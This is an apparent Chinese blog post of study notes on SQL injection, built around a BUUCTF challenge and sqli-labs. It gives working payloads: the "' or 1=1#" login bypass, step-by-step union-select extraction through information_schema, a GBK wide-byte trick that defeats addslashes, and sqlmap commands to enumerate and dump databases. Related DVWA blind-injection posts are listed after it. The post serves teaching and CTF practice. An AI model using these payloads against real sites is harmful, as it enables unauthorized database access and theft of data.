学习笔记——SQL(二)

最新推荐文章于 2023-05-30 10:29:30 发布
最新推荐文章于 2023-05-30 10:29:30 发布
阅读量231 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53056393/article/details/112602575
版权

目录

一、SQL注入

1.简介

SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。具体来说,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据,而不是按照设计者意图去执行SQL语句。
SQL注入产生的原因是网站开发者未经过恰当处理,直接将用户提交的参数拼接到后台数据库SQL语句中执行。

2.SQL注入基础

以BUUCTF上的一道注入题为例子
在这里插入图片描述
像这道题,就可以使用万能密码1 ‘or’ 1=1#
在这里插入图片描述
或者’ or 1=1#
在这里插入图片描述
最后都能得到flag。
正常语句:select * from users where username='$username' and password='$password';
注入语句:select * from users where username='admin' or 1=1#' and password='123456';

3.SQL注入的基本步骤

  1. 测试注入点是否存在,判断为数字型还是字符型,如何闭合 输入’页面报错,or 1=1#,and 1=1#为真,and 1=2#为假。
  2. 获取查询字段数(order by语句排除)
  3. 判断可回显的字段位置(union select联合查询)
  4. 获取数据库名等信息(database()函数,version()函数等)
  5. 获取表名(information_schema.tables)
  6. 获取表中字段名(information_schema.columns)
  7. 获取所需数据

二、数字型注入

当输入的参数为整型时,如:ID、年龄、页码等,如果存在注入漏洞,则可以认为是数字型注入,数字型注入是最简单的一种。

假设有URL为 HTTP://www.xxser.com/test.php?id=8 ,可以猜测SQL语句为:
select * from table where id=8
构造的注入语句为:HTTP://www.xxser.com/test.php?id=8 and 1=1# (有时#需替换为%23)
注入:select * from table where id=8 and 1=1#

构造的注入语句为:
HTTP://www.xxser.com/test.php?id=8 and 1=2#

SQL语句为:
select * from table where id=8 and 1=2#

虽然能够成功执行,但是无法查询到任何数据(因为 and 1=2为假),说明页面存在数字型注入。

?id=8 order by n#(n=1,2,3…)
select * from table where id=8 order by n#
从1到n依次替换数字,当页面报错 Unknown column ‘n’ in 'order clause’时,说明查询字段数为n。

?id=0 union select 1,2, ... , n #
select 1,2,...,n from table where id=0 union select 1,2, ... , n #
union select 的前后两个查询语句字段数必须一致。通过联合查询确定回显信息的字段位置。

?id=0 union select version(),database(), ... , n #
select 1,2,...,n from table where id=0 union select version(),database(), ... , n #
接下来就可以将后面的内容替换成我们真正需要查询的信息了,比如数据库版本和当前数据库名。

?id=0 union select group_concat(tables),2, ... , n from information_schema.tables where table_schema=database()#
通过information_schema库内的tables表查询当前数据库的所有表信息。
group_concat()函数能够能将字段的值打印成一行,以逗号分隔。

?id=0 union select group_concat(columns),2, ... , n from information_schema.columns where table_schema=database() and table_name='xxxx'#
通过information_schema库内的columns表查询xxxx表的所有列信息。

?id=0 union select group_concat(col1),group_concat(col2) from xxxx#
直接联合查询xxxx表内col1,col2两列所有信息。

三、字符型注入

当输入参数为字符串时,称为字符型。数字型与字符型注入最大的区别在于:数字类型不需要单引号闭合,而字符串类型一般要使用单引号来闭合。
数字型例句如下:select * from table where id = 1 or 1=1-- ;
字符型例句如下:select * from table where id =1 or 1=1-- ';

字符型注入最关键的是如何闭合SQL语句以及注释多余的代码。

四、宽字节注入

addslashes()函数返回在预定义字符之前添加反斜杠字符串。
预定义字符量:
单引号:(’ )
双引号:(")
反斜杠:(\)
NULL
这些函数可用于为储存在数据库中的字符串以及数据库查询语句准备字符。
默认的,PHP对所有的GET、POST\和COOKIE数据自动运行addslashes()。所以对于转义过的字符不用使用addslaches()函数,这样会导致双层转义,遇到这种情况可以使用函数get_magic_quotes_gpc()进行检测。

设置“set character_set_client=gbk”(GBK编码设置),通常导致编码转换的注入问题,尤其是使用php连接mysql数据库的时候。
宽字节就是两个字节以上的字节。一个GBK汉字编码由2个字节组成,首字节范围在7F【127】之上,而第2个字节,有一部分在0x40-0x7E【64-126】了。这就是导致bug原因。当设置GBK编码后,遇到连续两个字节,都符合GBK取值范围,会自动解析为一个汉字。

第一个字节范围(高字节)第二个字节范围(低字节)
0x81~0xFE [129~254]0x40~0xFE [64~254]

反斜杠 / 的对应编码为5C【92】,刚好在GBK编码的第二个字节范围内,因此如果反斜杠之前的一个字节编码大于0x80(128),PHP就会将这两个在范围内的字节解析成一个GBK字符,因而能够绕过addslashes函数对单引号的转义。

正常语句:
select * from users where username='zhangsan';

普通的字符型注入输入:
zhangsan' or 1=1#

经过addslashes转义:
select * from users where username='zhangsan\' or 1=1#';

宽字节注入输入:zhangsan%df' or 1=1# (0xdf = 223)

经过addslashes转义:
select * from users where username='zhangsan%df\' or 1=1#';
经过浏览器url编码:
select * from users where username='zhangsan%df%5c%27or%201=1%23';
%df%5c会被gbk编码的php解析成一个汉字“運”,原本的语句就成了:
select * from users where username='zhangsan運' or 1=1#';
实践:做题笔记——sqli-labs Less-32

五、SQLMAP的简单使用

查询有哪些数据库

sqlmap -u “目标URL” -dbs

查某个数据库的所有表

sqlmap -u “目标URL” -D 某数据库 -tables

查某个表格的所有列

	sqlmap -u “目标URL” -D 某数据库 -T 某表 -columns

爆某个表格的所有数据

	sqlmap -u “目标URL” -D 某数据库 -T 某表 -dump

获取sqlmap使用帮助

sqlmap -h
伊葉Irit
关注
DVWA-sql盲注
Darklord.W
04-09 831
sql盲注低中高步骤截图及说明 低等级: 判断是否存在注入,注入是字符型还是数字型 猜解数据库 库名长度为4 猜数据库名dvwa substr() 函数返回字符串的一部分 substr(string,start,length) 猜数据库中表名 可得表个数为2 猜表的长度 第一个为9,第个为5 猜表名 1' and ascii(substr(...
DVWA之sql盲注
qq_39670065的博客
08-08 2895
写在前面: 当时刷sqli-labs也浑浑噩噩没有做啥总结,现在就先从sql盲注总结开始吧 SQL Injection(Blind) SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知 sql盲注又分为布尔盲注,时间盲注和基于报错的盲注 理论上,能够布尔盲注就一定能时间盲注,能够时间盲注不一定能布尔盲注。相比之下,布尔盲注稳定性更好,时间盲注适用范围更广,但因为时间盲注的实现原理是基
dvwa学习sql盲注
温和的跳跃
10-11 674
sql注入之盲注盲注是什么盲注有哪些方法盲注流程盲注场景举例lowmidhigh细节解析 盲注是什么 盲注是区别普通注入,普通sql注入可以看见报错的sql信息,盲注是看不见任何报错的信息,无法知道注入的语句有没有被执行,页面无明显变化,所以叫盲注 盲注有哪些方法 虽然页面没有明显变化但是通过你的fuzz还是会产生一定差别,比如输入正常的值产生正常页面,反之通过注入数据库函数bool语句观察页面变化,如果sql注入成功数据库是需要时间去执行的,所以还可以通过观察时间来判断。因此就有最基本的两种盲注办法:bo
dvwa之SQL盲注
最新发布
ANDTM的博客
05-30 1041
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQL盲注和SQL注入的区别就是盲注它不会有完整的回显,这里分为两种,一种是布尔盲注,另一种是时间盲注。
DVWA之 SQL Injection(Blind)
谢公子的博客
08-05 2792
SQL Injection(Blind) SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 手工盲注思路 手工盲注的过程,就像你与一个机器人聊天,...
学习笔记——sql.zip
06-08
"学习笔记——sql.zip"这个压缩包文件很可能包含了关于SQL学习资料,如教程、笔记、示例代码等,旨在帮助用户掌握SQL的基本概念、语法和高级特性。 首先,SQL的基础知识包括数据类型,如整型(INT)、浮点型...
SQL学习笔记——表结构转换查询
01-21
1、纵表转横表 建表 --先调用自建的数据库再建表 use ljh create table sc( sname char(20), course char(20), score int) --随机插入几个记录 insert into sc values('张三','语文',98), ('张三','数学',89), ...
SQL笔记——学习sql时候的一些笔记SQL基础
10-18
SQL基础知识点总结 SQL(Structured Query Language)是一种用于管理关系数据库管理系统的标准语言。以下是SQL基础知识点总结: 1. SQL基本操作 * SELECT:从数据库表中获取数据 * UPDATE:更新数据库表中的数据 ...
《数据库系统概念》学习笔记——SQL
weixin_45243288的博客
11-22 2828
数据库系统概念——SQLSQL查询语言概览SQL数据定义基本类型基本模式定义SQL查询的基本结构单关系查询多关系查询自然连接附加的基本运算集合运算空值聚集函数嵌套子查询数据库的修改总结 SQL查询语言概览 SQL语言有以下几个部分: 数据定义语言(Data-Definition Language, DDL):SQL DDL提供定义关系模式、删除关系以及修改关系模式的命令。 数据操纵语言(Data-Manipulation Language, DML):SQL DML提供从数据库中查询信息,以及在数据库中
DVWA中SQL盲注
随 风
10-27 581
一、SQL盲注过程 (1)判断是否存在注入,注入是字符型还是数字型; (2)猜解当前数据库名---->猜解数据库名长度---->猜解数据库名称; (3)猜解数据库中的表名---->猜解表数量---->猜解表长度---->猜解表名称; (4)猜解表中字段名---->猜解当前表中有多少个字段---->猜解字段长度---->猜解字段名称 (5)猜解数据 SQL Injection(Blind) 1、Low级别 布尔盲注 (1)判断是否存在注入,注入是字符型还是
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
dvwa-sql盲注
AI_SumSky的博客
11-27 4692
sql盲注 low级别 先提交个参数,发现执行成功就是回显时只是说这个id存在数据库,没有回显出id具体信息,怪不得叫盲注。 分析源码没有对所提交参数id做任何处理就直接执行了,只是回显的时候被隐藏了。 其实也可以通过ascaii码来一个一个字符弄出来,输入1’ and length(database())=1#,显示User ID is MISSING from the database. 输入1’ and length(database())=2#,显示User ID is MISSING from
DVWA-SQL盲注
HoYim
03-05 563
基于布尔的盲注 判断是否存在注入,注入是字符型还是数字型 输入1’and ‘1’=‘1,判断条件正确 输入1’ and ‘1’=‘2,判断条件错误 由此判断存在字符型注入 2.猜解当前数据库名 猜数据库名的长度 输入1’ and length(database())=4# 确定长度为4 然后猜数据库名字,可用分法节省时间 输入1’ and ascii(substr(databse(),0...
DVWA之SQL注入盲注
chtdgf的博客
02-14 1173
DVWA之SQL注入盲注 一 LOW级别 我们可以通过 View Source获得代码如下 <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysql
DVWA——SQL盲注(全等级)
@一只躺平的猪@的博客
07-13 5673
SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
DVWA之SQL注入(盲注)
天空之蓝的博客
11-17 3220
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWA------SQL Injection (Blind)(SQL盲注)
m0_65712192的博客
12-09 2918
DVWA------SQL Injection (Blind)(SQL盲注)
DVWA之sql注入——盲注
Williamanddog的博客
12-22 3168
DVWA的盲注
DVWA 之 SQL Injection Blind(SQL盲注)
RexHa的博客
10-04 2400
DVWA sql盲注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值